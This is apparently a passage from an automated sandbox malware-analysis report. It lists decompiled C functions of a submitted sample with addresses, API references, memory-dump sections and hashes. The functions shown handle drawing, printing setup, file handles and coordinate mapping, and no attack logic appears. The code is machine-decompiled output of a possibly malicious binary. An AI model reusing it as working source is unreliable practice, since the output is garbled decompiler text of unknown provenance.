						_t267 = _t267 + 4;
						_v20 = _v20 - 1;
					}
					_v20 = _v12 - _v16;
					while(_v20 >= 0) {
						BitBlt(_a16, _a20 + _v16 * _a40, _a24 + (_v20 - 1) * _a40, _a40, _a40, _a4, _a8 + _v16 * _a40, _a12 + (_v20 - 1) * _a40, 0xcc0020);
						_t230 = _a36;
						E0040381D(_t230);
						_t267 = _t267 + 4;
						_v20 = _v20 - 1;
					}
					_v16 = _v16 + 1;
				}
				BitBlt(_a16, _a20, _a24, _a28, _a32, _a4, _a8, _a12, 0xcc0020);
				return 1;
			}

0x004041bf
0x004041c1
0x004041c1
0x004041cb
0x004041d2
0x004041d5
0x004041d8
0x004041d9
0x004041df
0x004041e2
0x004041e9
0x004041ec
0x004041f4
0x00000000
0x00000000
0x004041fa
0x0040420c
0x00404260
0x00404266
0x0040426a
0x0040426f
0x00404209
0x00404209
0x00404274
0x00404286
0x004042e6
0x004042ec
0x004042f0
0x004042f5
0x00404283
0x00404283
0x00404300
0x0040430e
0x0040436f
0x00404375
0x00404379
0x0040437e
0x0040430b
0x0040430b
0x00404389
0x00404397
0x004043ec
0x004043f2
0x004043f6
0x004043fb
0x00404394
0x00404394
0x00404406
0x00404406
0x00404433
0x0040443e

APIs

BitBlt.GDI32(?,?,?,00000004,00000004,?,00000000,00000000,00CC0020), ref: 00404260
BitBlt.GDI32(?,?,?,00000004,00000004,?,?,00000000,00CC0020), ref: 004042E6
BitBlt.GDI32(?,?,?,00000004,00000004,?,00000000,?,00CC0020), ref: 0040436F
BitBlt.GDI32(?,?,?,00000004,00000004,?,00000000,00000000,00CC0020), ref: 004043EC
BitBlt.GDI32(?,?,?,?,?,?,00000000,?,00CC0020), ref: 00404433

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4852f428c49f7dbf2d34c0264fcda9c88eb02544480e12d11db3c71bda218985
Instruction ID: 29e2845c1fd78097f43836e8b5be001507bced236b49523afccdde5b5024b9e6
Opcode Fuzzy Hash: 4852f428c49f7dbf2d34c0264fcda9c88eb02544480e12d11db3c71bda218985
Instruction Fuzzy Hash: 1EA197B1A001099FCB08CFACC995AEEB7B9FF88308F158659F919A7244D734E915CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0042669F, Relevance: 7.7, APIs: 5, Instructions: 152
stringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0042669F(void* __ecx) {
				intOrPtr _t67;
				void* _t69;
				void* _t72;
				CHAR** _t77;
				intOrPtr _t90;
				signed int _t112;
				void* _t117;
				void* _t129;
				intOrPtr* _t132;
				signed short* _t134;
				intOrPtr* _t135;
				intOrPtr* _t136;
				void* _t137;

				E00406520(E00429D12, _t137);
				_t129 = __ecx;
				if( *((intOrPtr*)(_t137 + 8)) != 0) {
					L20:
					_push(0);
					_push(0x14000c);
					_push(1);
					E0041009E(_t137 - 0x160);
					 *(_t137 - 4) = 2;
					E0041030E(_t137 - 0x160);
					_t65 =  *((intOrPtr*)(_t129 + 0x94));
					if( *((intOrPtr*)(_t129 + 0x94)) != 0) {
						E0041A92B(_t65);
					}
					_t66 =  *((intOrPtr*)(_t129 + 0x98));
					_t132 = _t129 + 0x98;
					if( *((intOrPtr*)(_t129 + 0x98)) != 0) {
						E0041A92B(_t66);
					}
					_t67 =  *((intOrPtr*)(_t137 - 0x104));
					 *(_t137 - 4) =  *(_t137 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t129 + 0x94)) =  *((intOrPtr*)(_t67 + 8));
					 *_t132 =  *((intOrPtr*)(_t67 + 0xc));
					_t117 = _t137 - 0x160;
					L25:
					_t69 = E00411D13(_t117);
					L26:
					 *[fs:0x0] =  *((intOrPtr*)(_t137 - 0xc));
					return _t69;
				}
				_t72 =  *(__ecx + 0x98);
				if(_t72 == 0) {
					goto L20;
				}
				_t69 = GlobalLock(_t72);
				_t134 = _t69;
				if((_t134[3] & 0x00000001) == 0) {
					goto L26;
				}
				_push(0);
				_push(0x14000c);
				_push(1);
				E0041009E(_t137 - 0xbc);
				 *(_t137 - 4) = 0;
				E0041030E(_t137 - 0xbc);
				if( *((intOrPtr*)( *((intOrPtr*)(_t137 - 0x60)) + 0xc)) != 0) {
					_t77 = E00410255(_t137 - 0xbc, _t137 - 0x10);
					 *(_t137 - 4) = 1;
					if(lstrcmpA(_t134 + ( *_t134 & 0x0000ffff),  *_t77) != 0) {
						L10:
						_t112 = 1;
						L11:
						 *(_t137 - 4) =  *(_t137 - 4) & 0x00000000;
						E00416AEC(_t137 - 0x10);
						if(_t112 == 0) {
							_t83 =  *((intOrPtr*)( *((intOrPtr*)(_t137 - 0x60)) + 8));
							if( *((intOrPtr*)( *((intOrPtr*)(_t137 - 0x60)) + 8)) != 0) {
								E0041A92B(_t83);
							}
							_t85 =  *((intOrPtr*)( *((intOrPtr*)(_t137 - 0x60)) + 0xc));
							if( *((intOrPtr*)( *((intOrPtr*)(_t137 - 0x60)) + 0xc)) != 0) {
								E0041A92B(_t85);
							}
						} else {
							_t88 =  *((intOrPtr*)(_t129 + 0x94));
							_t135 = _t129 + 0x94;
							if( *((intOrPtr*)(_t129 + 0x94)) != 0) {
								E0041A92B(_t88);
							}
							E0041A92B( *((intOrPtr*)(_t129 + 0x98)));
							_t90 =  *((intOrPtr*)(_t137 - 0x60));
							 *_t135 =  *((intOrPtr*)(_t90 + 8));
							 *((intOrPtr*)(_t129 + 0x98)) =  *((intOrPtr*)(_t90 + 0xc));
						}
						L19:
						 *(_t137 - 4) =  *(_t137 - 4) | 0xffffffff;
						_t117 = _t137 - 0xbc;
						goto L25;
					}
					 *((char*)(_t137 + 0xb)) = lstrcmpA(_t134 + (_t134[1] & 0x0000ffff),  *(E00410292(_t137 - 0xbc, _t137 - 0x14))) != 0;
					E00416AEC(_t137 - 0x14);
					if( *((char*)(_t137 + 0xb)) != 0) {
						goto L10;
					}
					_t112 = lstrcmpA & 0xffffff00 | lstrcmpA(_t134 + (_t134[2] & 0x0000ffff),  *(E004102D0(_t137 - 0xbc, _t137 - 0x18))) != 0x00000000;
					E00416AEC(_t137 - 0x18);
					if(_t112 == 0) {
						goto L11;
					}
					goto L10;
				}
				_t105 =  *((intOrPtr*)(_t129 + 0x94));
				_t136 = _t129 + 0x94;
				if( *((intOrPtr*)(_t129 + 0x94)) != 0) {
					E0041A92B(_t105);
				}
				E0041A92B( *((intOrPtr*)(_t129 + 0x98)));
				 *_t136 = 0;
				 *((intOrPtr*)(_t129 + 0x98)) = 0;
				goto L19;
			}

0x004266a4
0x004266b7
0x004266b9
0x00426829
0x00426829
0x0042682a
0x0042682f
0x00426837
0x00426842
0x00426849
0x0042684e
0x00426856
0x00426859
0x00426859
0x0042685e
0x00426864
0x0042686c
0x0042686f
0x0042686f
0x00426874
0x0042687a
0x00426881
0x0042688a
0x0042688c
0x00426892
0x00426892
0x00426897
0x0042689d
0x004268a5
0x004268a5
0x004266bf
0x004266c7
0x00000000
0x00000000
0x004266ce
0x004266d4
0x004266da
0x00000000
0x00000000
0x004266e0
0x004266e1
0x004266e6
0x004266ee
0x004266f9
0x004266fc
0x00426707
0x00426741
0x00426753
0x0042675c
0x004267b7
0x004267b7
0x004267b9
0x004267b9
0x004267c0
0x004267c7
0x00426800
0x00426805
0x00426808
0x00426808
0x00426810
0x00426815
0x00426818
0x00426818
0x004267c9
0x004267c9
0x004267cf
0x004267d7
0x004267da
0x004267da
0x004267e5
0x004267ea
0x004267f0
0x004267f5
0x004267f5
0x0042681d
0x0042681d
0x00426821
0x00000000
0x00426821
0x0042677d
0x00426781
0x0042678a
0x00000000
0x00000000
0x004267ab
0x004267ae
0x004267b5
0x00000000
0x00000000
0x00000000
0x004267b5
0x00426709
0x0042670f
0x00426717
0x0042671a
0x0042671a
0x00426725
0x0042672a
0x0042672c
0x00000000

APIs

__EH_prolog.LIBCMT ref: 004266A4
lstrcmpA.KERNEL32(00000000,00000000,?,00000001,0014000C,00000000), ref: 00426758
lstrcmpA.KERNEL32(?,00000000,?), ref: 00426776
lstrcmpA.KERNEL32(?,00000000,?,?), ref: 004267A4

Part of subcall function 0041A92B: GlobalFlags.KERNEL32(?), ref: 0041A935
Part of subcall function 0041A92B: GlobalUnlock.KERNEL32(?,?,?,0042421F,?,?,?,?,0040199F,00437BE8,?,004013A2), ref: 0041A94C
Part of subcall function 0041A92B: GlobalFree.KERNEL32 ref: 0041A957

GlobalLock.KERNEL32 ref: 004266CE

Part of subcall function 0041009E: __EH_prolog.LIBCMT ref: 004100A3

Part of subcall function 0041030E: PrintDlgA.COMDLG32(?,0042684E,00000001,0014000C,00000000,?,?,00000000), ref: 00410318

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Global$lstrcmp$H_prolog$FlagsFreeLockPrintUnlock
String ID:
API String ID: 2564375162-0
Opcode ID: 653e2c81b0d72e161c244adbd25edb8e30c70488008d71227ddbd14f21ca4b2e
Instruction ID: dab6b3ac01e2e209cde5cdaaba7fbabb505c74ae40abd7d4cd101a1c9b428fb9
Opcode Fuzzy Hash: 653e2c81b0d72e161c244adbd25edb8e30c70488008d71227ddbd14f21ca4b2e
Instruction Fuzzy Hash: E851A070B002269BCB14EF75D885FDAB7B8BF01308F41446EE559A3292DB38ED94CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040963B, Relevance: 7.6, APIs: 5, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E0040963B() {
				void** _v8;
				struct _STARTUPINFOA _v76;
				signed int* _t48;
				signed int _t50;
				long _t55;
				signed int _t57;
				signed int _t58;
				int _t59;
				signed char _t63;
				signed int _t65;
				void** _t67;
				int _t68;
				int _t69;
				signed int* _t70;
				int _t72;
				intOrPtr* _t73;
				signed int* _t75;
				void* _t76;
				void* _t84;
				void* _t87;
				int _t88;
				signed int* _t89;
				void** _t90;
				signed int _t91;
				int* _t92;

				_t89 = E00405667(0x480);
				if(_t89 == 0) {
					E00406490(0x1b);
				}
				 *0x43b520 = _t89;
				 *0x43b620 = 0x20;
				_t1 =  &(_t89[0x120]); // 0x480
				_t48 = _t1;
				while(_t89 < _t48) {
					_t89[1] = _t89[1] & 0x00000000;
					 *_t89 =  *_t89 | 0xffffffff;
					_t89[2] = _t89[2] & 0x00000000;
					_t89[1] = 0xa;
					_t70 =  *0x43b520; // 0x21548c0
					_t89 =  &(_t89[9]);
					_t48 =  &(_t70[0x120]);
				}
				GetStartupInfoA( &_v76);
				__eflags = _v76.cbReserved2;
				if(_v76.cbReserved2 == 0) {
					L25:
					_t72 = 0;
					__eflags = 0;
					do {
						_t75 =  *0x43b520; // 0x21548c0
						_t50 = _t72 + _t72 * 8;
						__eflags = _t75[_t50] - 0xffffffff;
						_t90 =  &(_t75[_t50]);
						if(_t75[_t50] != 0xffffffff) {
							_t45 =  &(_t90[1]);
							 *_t45 = _t90[1] | 0x00000080;
							__eflags =  *_t45;
							goto L37;
						}
						__eflags = _t72;
						_t90[1] = 0x81;
						if(_t72 != 0) {
							asm("sbb eax, eax");
							_t55 =  ~(_t72 - 1) + 0xfffffff5;
							__eflags = _t55;
						} else {
							_t55 = 0xfffffff6;
						}
						_t87 = GetStdHandle(_t55);
						__eflags = _t87 - 0xffffffff;
						if(_t87 == 0xffffffff) {
							L33:
							_t90[1] = _t90[1] | 0x00000040;
						} else {
							_t57 = GetFileType(_t87);
							__eflags = _t57;
							if(_t57 == 0) {
								goto L33;
							}
							_t58 = _t57 & 0x000000ff;
							 *_t90 = _t87;
							__eflags = _t58 - 2;
							if(_t58 != 2) {
								__eflags = _t58 - 3;
								if(_t58 == 3) {
									_t90[1] = _t90[1] | 0x00000008;
								}
								goto L37;
							}
							goto L33;
						}
						L37:
						_t72 = _t72 + 1;
						__eflags = _t72 - 3;
					} while (_t72 < 3);
					return SetHandleCount( *0x43b620);
				}
				_t59 = _v76.lpReserved2;
				__eflags = _t59;
				if(_t59 == 0) {
					goto L25;
				}
				_t88 =  *_t59;
				_t73 = _t59 + 4;
				_v8 = _t73 + _t88;
				__eflags = _t88 - 0x800;
				if(_t88 >= 0x800) {
					_t88 = 0x800;
				}
				__eflags =  *0x43b620 - _t88; // 0x20
				if(__eflags >= 0) {
					L18:
					_t91 = 0;
					__eflags = _t88;
					if(_t88 <= 0) {
						goto L25;
					} else {
						goto L19;
					}
					do {
						L19:
						_t76 =  *_v8;
						__eflags = _t76 - 0xffffffff;
						if(_t76 == 0xffffffff) {
							goto L24;
						}
						_t63 =  *_t73;
						__eflags = _t63 & 0x00000001;
						if((_t63 & 0x00000001) == 0) {
							goto L24;
						}
						__eflags = _t63 & 0x00000008;
						if((_t63 & 0x00000008) != 0) {
							L23:
							_t65 = _t91 & 0x0000001f;
							__eflags = _t65;
							_t67 =  &(0x43b520[_t91 >> 5][_t65 + _t65 * 8]);
							 *_t67 =  *_v8;
							_t67[1] =  *_t73;
							goto L24;
						}
						_t68 = GetFileType(_t76);
						__eflags = _t68;
						if(_t68 == 0) {
							goto L24;
						}
						goto L23;
						L24:
						_v8 =  &(_v8[1]);
						_t91 = _t91 + 1;
						_t73 = _t73 + 1;
						__eflags = _t91 - _t88;
					} while (_t91 < _t88);
					goto L25;
				} else {
					_t92 = 0x43b524;
					while(1) {
						_t69 = E00405667(0x480);
						__eflags = _t69;
						if(_t69 == 0) {
							break;
						}
						 *0x43b620 =  *0x43b620 + 0x20;
						__eflags =  *0x43b620;
						 *_t92 = _t69;
						_t13 = _t69 + 0x480; // 0x480
						_t84 = _t13;
						while(1) {
							__eflags = _t69 - _t84;
							if(_t69 >= _t84) {
								break;
							}
							 *(_t69 + 4) =  *(_t69 + 4) & 0x00000000;
							 *_t69 =  *_t69 | 0xffffffff;
							 *(_t69 + 8) =  *(_t69 + 8) & 0x00000000;
							 *((char*)(_t69 + 5)) = 0xa;
							_t69 = _t69 + 0x24;
							_t84 =  *_t92 + 0x480;
						}
						_t92 =  &(_t92[1]);
						__eflags =  *0x43b620 - _t88; // 0x20
						if(__eflags < 0) {
							continue;
						}
						goto L18;
					}
					_t88 =  *0x43b620; // 0x20
					goto L18;
				}
			}

0x0040964e
0x00409653
0x00409657
0x0040965c
0x0040965d
0x00409663
0x0040966d
0x0040966d
0x00409673
0x00409677
0x0040967b
0x0040967e
0x00409682
0x00409686
0x0040968b
0x0040968e
0x0040968e
0x00409699
0x0040969f
0x004096a4
0x0040977b
0x0040977b
0x0040977b
0x0040977d
0x0040977d
0x00409783
0x00409786
0x0040978a
0x0040978d
0x004097dc
0x004097dc
0x004097dc
0x00000000
0x004097dc
0x0040978f
0x00409791
0x00409795
0x004097a1
0x004097a3
0x004097a3
0x00409797
0x00409799
0x00409799
0x004097ad
0x004097af
0x004097b2
0x004097cb
0x004097cb
0x004097b4
0x004097b5
0x004097bb
0x004097bd
0x00000000
0x00000000
0x004097bf
0x004097c4
0x004097c6
0x004097c9
0x004097d1
0x004097d4
0x004097d6
0x004097d6
0x00000000
0x004097d4
0x00000000
0x004097c9
0x004097e0
0x004097e0
0x004097e1
0x004097e1
0x004097f6
0x004097f6
0x004096aa
0x004096ad
0x004096af
0x00000000
0x00000000
0x004096b5
0x004096b7
0x004096bd
0x004096c5
0x004096c7
0x004096c9
0x004096c9
0x004096cb
0x004096d1
0x00409729
0x00409729
0x0040972b
0x0040972d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040972f
0x0040972f
0x00409732
0x00409734
0x00409737
0x00000000
0x00000000
0x00409739
0x0040973b
0x0040973d
0x00000000
0x00000000
0x0040973f
0x00409741
0x0040974e
0x00409755
0x00409755
0x00409762
0x0040976a
0x0040976e
0x00000000
0x0040976e
0x00409744
0x0040974a
0x0040974c
0x00000000
0x00000000
0x00000000
0x00409771
0x00409771
0x00409775
0x00409776
0x00409777
0x00409777
0x00000000
0x004096d3
0x004096d3
0x004096d8
0x004096dd
0x004096e2
0x004096e5
0x00000000
0x00000000
0x004096e7
0x004096e7
0x004096ee
0x004096f0
0x004096f0
0x004096f6
0x004096f6
0x004096f8
0x00000000
0x00000000
0x004096fa
0x004096fe
0x00409701
0x00409705
0x0040970b
0x0040970e
0x0040970e
0x00409716
0x00409719
0x0040971f
0x00000000
0x00000000
0x00000000
0x00409721
0x00409723
0x00000000
0x00409723

APIs

GetStartupInfoA.KERNEL32(?), ref: 00409699
GetFileType.KERNEL32(?,?,00000000), ref: 00409744
GetStdHandle.KERNEL32(-000000F6,?,00000000), ref: 004097A7
GetFileType.KERNEL32(00000000,?,00000000), ref: 004097B5
SetHandleCount.KERNEL32 ref: 004097EC

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: FileHandleType$CountInfoStartup
String ID:
API String ID: 1710529072-0
Opcode ID: ecd1a007bcd950c4f6a802b73a84018a70199882e3a03b2a3ff8f6cc88cac146
Instruction ID: 8f3487591cd982a3eb9725f147ad5950e145dc92a1b9c359c43610153c7b6e5a
Opcode Fuzzy Hash: ecd1a007bcd950c4f6a802b73a84018a70199882e3a03b2a3ff8f6cc88cac146
Instruction Fuzzy Hash: F8510832514605CBD7208F38C884B7677E0EB05368F28467ED596EB3E2D7389C06C759

Uniqueness

Uniqueness Score: -1.00%

Function 0042722C, Relevance: 7.6, APIs: 5, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0042722C(void* __ecx, void* __edx, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				char _v12;
				void* _v20;
				void* __ebp;
				intOrPtr* _t51;
				intOrPtr _t54;
				int _t58;
				signed int _t65;
				int _t77;
				void* _t79;
				signed int _t80;
				signed int _t82;
				signed int _t83;
				int _t84;
				void* _t88;
				int _t91;
				signed int _t100;
				signed int _t104;
				void* _t109;
				struct tagRECT* _t110;

				_t88 = __ecx;
				_t104 = _a4 + _a4 * 4 << 3;
				_t109 = _t104 +  *((intOrPtr*)(__ecx + 0x90));
				_t51 = E004271A8(__ecx, __edx, __eflags,  &_v20);
				_v12 =  *_t51;
				_v8 =  *((intOrPtr*)(_t51 + 4));
				_t91 =  *(_t109 + 0x24);
				_t100 = 0 |  *(_t109 + 0x20) - _t91 < 0x00000000;
				_t54 =  *((intOrPtr*)(__ecx + 0xec));
				if(_t54 == 0) {
					 *(_t109 + 0x18) =  *(_t109 + 0x20);
					 *(_t109 + 0x1c) =  *(_t109 + 0x24);
					L12:
					_v20 = MulDiv( *(_t109 + 0x10),  *(_t109 + 0x18),  *(_t109 + 0x1c));
					_t58 = MulDiv( *(_t109 + 0x14),  *(_t109 + 0x18),  *(_t109 + 0x1c));
					_t110 = _t104 +  *((intOrPtr*)(_t88 + 0x90));
					SetRect(_t110, 8, 8, _v20 + 0xb, _t58 + 0xb);
					if( *((intOrPtr*)(_t88 + 0xec)) != 0) {
						_push(0x42e4b0);
						_t65 = _t110->right - _t110->left + 0x10;
						__eflags = _t65;
						_push( &_v12);
						_push(_t110->bottom - _t110->top + 0x10);
						_push(_t65);
						_push(1);
						return E0041AE9C(_t88, _t65);
					}
					asm("cdq");
					asm("cdq");
					_t77 = OffsetRect(_t110, (_v12 - _t110->right - _t110->left - _t100 >> 1) - 1, (_v8 - _t110->bottom - _t110->top - _t100 >> 1) - 1);
					if(_a4 != 1) {
						return _t77;
					}
					return OffsetRect(_t110,  *(_t88 + 0xfc), 0);
				}
				_t79 = _t54 - 1;
				if(_t79 == 0) {
					__eflags = _t100;
					 *(_t109 + 0x1c) = _t91;
					_t80 =  *(_t109 + 0x20);
					if(_t100 == 0) {
						_t82 = _t80 + _t80 * 2 - _t91;
					} else {
						_t82 = _t80 + _t91;
						__eflags = _t82;
					}
					asm("cdq");
					_t83 = _t82 - _t100;
					__eflags = _t83;
					_t84 = _t83 >> 1;
					L9:
					 *(_t109 + 0x18) = _t84;
					goto L12;
				}
				if(_t79 != 1) {
					goto L12;
				}
				if(_t100 == 0) {
					 *(_t109 + 0x1c) = _t91;
					_t84 = ( *(_t109 + 0x20) << 1) -  *(_t109 + 0x24);
				} else {
					_t84 = 1;
					 *(_t109 + 0x1c) = _t84;
				}
				goto L9;
			}

0x00427238
0x00427243
0x00427246
0x0042724d
0x00427256
0x0042725c
0x0042725f
0x0042726b
0x0042726e
0x00427271
0x004272b2
0x004272b8
0x004272bb
0x004272cd
0x004272d6
0x004272ec
0x004272f4
0x00427301
0x00427350
0x00427358
0x00427358
0x0042735b
0x0042735c
0x0042735d
0x0042735e
0x00000000
0x00427362
0x00427313
0x00427325
0x0042732d
0x00427333
0x0042736b
0x0042736b
0x00000000
0x0042733e
0x00427273
0x00427274
0x00427292
0x00427294
0x00427297
0x0042729a
0x004272ab
0x0042729c
0x0042729c
0x0042729c
0x0042729c
0x0042729e
0x0042729f
0x0042729f
0x004272a1
0x004272a3
0x004272a3
0x00000000
0x004272a3
0x00427277
0x00000000
0x00000000
0x0042727b
0x00427285
0x0042728d
0x0042727d
0x0042727f
0x00427280
0x00427280
0x00000000

APIs

MulDiv.KERNEL32(?,?,?), ref: 004272C4
MulDiv.KERNEL32(?,?,?), ref: 004272D6
SetRect.USER32 ref: 004272F4
OffsetRect.USER32(?,?,?), ref: 0042732D
OffsetRect.USER32(?,?,00000000), ref: 0042733E

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Rect$Offset
String ID:
API String ID: 3858320380-0
Opcode ID: a8bcfc7a24c1dd58891d067b0bfb63c54d62dd3b19c554575f39b6ca731ca03a
Instruction ID: 9d4db4d92ebfce67b92012e8cfbb6e150ce2038beb84166a71d0e9c619fd8a43
Opcode Fuzzy Hash: a8bcfc7a24c1dd58891d067b0bfb63c54d62dd3b19c554575f39b6ca731ca03a
Instruction Fuzzy Hash: 15418871600A15DFD720CF68D944AAABBF6FB88300F484A2DE886D7655D734F805CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041AE9C, Relevance: 7.6, APIs: 5, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0041AE9C(void* __ecx, void* __eflags) {
				struct tagPOINT* _t76;
				long* _t78;
				long* _t81;
				struct tagPOINT* _t82;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				int _t87;
				struct tagPOINT* _t97;
				signed int _t108;
				void* _t123;
				void* _t125;

				E00406520(E0042A85C, _t125);
				_t123 = __ecx;
				_push(0);
				 *(_t125 - 0x10) =  *(__ecx + 0x40);
				 *(__ecx + 0x40) =  *(_t125 + 8);
				 *(__ecx + 0x44) =  *(_t125 + 0xc);
				 *(__ecx + 0x48) =  *(_t125 + 0x10);
				E0041A41D(_t125 - 0x24, __eflags);
				 *(_t125 - 4) =  *(_t125 - 4) & 0x00000000;
				E00419E91(_t125 - 0x24,  *(__ecx + 0x40));
				_t76 = __ecx + 0x4c;
				_t76->x =  *(__ecx + 0x44);
				_t76->y =  *(__ecx + 0x48);
				LPtoDP( *(_t125 - 0x1c), _t76, 1);
				_t78 =  *(_t125 + 0x14);
				_t97 = __ecx + 0x54;
				_t97->x =  *_t78;
				_t97->y = _t78[1];
				LPtoDP( *(_t125 - 0x1c), _t97, 1);
				_t81 =  *(_t125 + 0x18);
				_t82 = __ecx + 0x5c;
				_t82->x =  *_t81;
				_t82->y = _t81[1];
				LPtoDP( *(_t125 - 0x1c), _t82, 1);
				_t84 =  *(__ecx + 0x50);
				if(_t84 < 0) {
					 *(__ecx + 0x50) =  ~_t84;
				}
				_t85 =  *(_t123 + 0x58);
				if(_t85 < 0) {
					 *(_t123 + 0x58) =  ~_t85;
				}
				_t86 =  *(_t123 + 0x60);
				if(_t86 < 0) {
					 *(_t123 + 0x60) =  ~_t86;
				}
				 *(_t125 - 4) =  *(_t125 - 4) | 0xffffffff;
				_t87 = E0041A48F(_t125 - 0x24);
				_t108 = 0xa;
				if(_t97->x == 0) {
					asm("cdq");
					_t87 =  *(_t123 + 0x4c) / _t108;
					_t97->x = _t87;
				}
				if( *(_t123 + 0x58) == 0) {
					asm("cdq");
					_t87 =  *(_t123 + 0x50) / _t108;
					 *(_t123 + 0x58) = _t87;
				}
				if( *(_t123 + 0x5c) == 0) {
					asm("cdq");
					_t87 = _t97->x / _t108;
					 *(_t123 + 0x5c) = _t87;
				}
				if( *(_t123 + 0x60) == 0) {
					asm("cdq");
					_t87 =  *(_t123 + 0x58) / _t108;
					 *(_t123 + 0x60) = _t87;
				}
				if( *(_t123 + 0x1c) != 0) {
					E0041B2F1(_t123);
					_t87 =  *(_t125 - 0x10);
					if(_t87 !=  *((intOrPtr*)(_t123 + 0x40))) {
						_t87 = InvalidateRect( *(_t123 + 0x1c), 0, 1);
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t125 - 0xc));
				return _t87;
			}

0x0041aea1
0x0041aeab
0x0041aeae
0x0041aeb6
0x0041aebc
0x0041aec2
0x0041aec8
0x0041aecb
0x0041aed3
0x0041aeda
0x0041aee8
0x0041aef1
0x0041aef6
0x0041aef9
0x0041aefb
0x0041aefe
0x0041af0c
0x0041af0e
0x0041af11
0x0041af13
0x0041af1d
0x0041af24
0x0041af26
0x0041af29
0x0041af2b
0x0041af30
0x0041af34
0x0041af34
0x0041af37
0x0041af3c
0x0041af40
0x0041af40
0x0041af43
0x0041af48
0x0041af4c
0x0041af4c
0x0041af4f
0x0041af56
0x0041af60
0x0041af61
0x0041af68
0x0041af69
0x0041af6b
0x0041af6b
0x0041af71
0x0041af78
0x0041af79
0x0041af7b
0x0041af7b
0x0041af83
0x0041af89
0x0041af8a
0x0041af8c
0x0041af8c
0x0041af92
0x0041af97
0x0041af98
0x0041af9a
0x0041af9a
0x0041afa0
0x0041afa4
0x0041afa9
0x0041afaf
0x0041afb7
0x0041afb7
0x0041afaf
0x0041afc3
0x0041afcb

APIs

__EH_prolog.LIBCMT ref: 0041AEA1

Part of subcall function 0041A41D: __EH_prolog.LIBCMT ref: 0041A422
Part of subcall function 0041A41D: GetWindowDC.USER32(?,?,?,0041AED0,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0041A44B

Part of subcall function 00419E91: SetMapMode.GDI32(?,?), ref: 00419EAA
Part of subcall function 00419E91: SetMapMode.GDI32(?,?), ref: 00419EB8

LPtoDP.GDI32(?,?,00000001), ref: 0041AEF9
LPtoDP.GDI32(?,?,00000001), ref: 0041AF11
LPtoDP.GDI32(?,?,00000001), ref: 0041AF29
InvalidateRect.USER32(?,00000000,00000001), ref: 0041AFB7

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: H_prologMode$InvalidateRectWindow
String ID:
API String ID: 2422810626-0
Opcode ID: 833de7a5b383fbafa19164f96b33c5ca989ee9024f938b107583b44dd389414c
Instruction ID: ea718bac83f46552081215f01c1c436204e2ca2be48b4d518ea9ba6a6dc7aab3
Opcode Fuzzy Hash: 833de7a5b383fbafa19164f96b33c5ca989ee9024f938b107583b44dd389414c
Instruction Fuzzy Hash: 904104B0601B159FCB20DF6AC880A9AB7F5FF48304F10482EE946D7790D7B5E855CB15

